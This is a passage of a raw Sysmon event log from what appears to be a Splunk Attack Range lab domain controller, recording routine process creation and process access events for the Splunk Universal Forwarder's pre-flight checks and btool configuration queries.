Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\pre-flight-checksMD5=52414E13BC571139A78F09588A1364A4,SHA256=3C1F79227940F5C563684E97F96860594D7E76089653064CB910620CB735929B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.562{266CAFBE-64F1-6064-F500-00000000AE01}68686880C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64F1-6064-F400-00000000AE01}68886804C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.306{266CAFBE-64F1-6064-F500-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000008375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.297{266CAFBE-64F1-6064-F300-00000000AE01}67286724C:\Windows\system32\cmd.exe{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.299{266CAFBE-64F1-6064-F400-00000000AE01}6888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000008367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.281{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.293{266CAFBE-64F1-6064-F300-00000000AE01}6728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.265{266CAFBE-64F1-6064-F200-00000000AE01}41326716C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 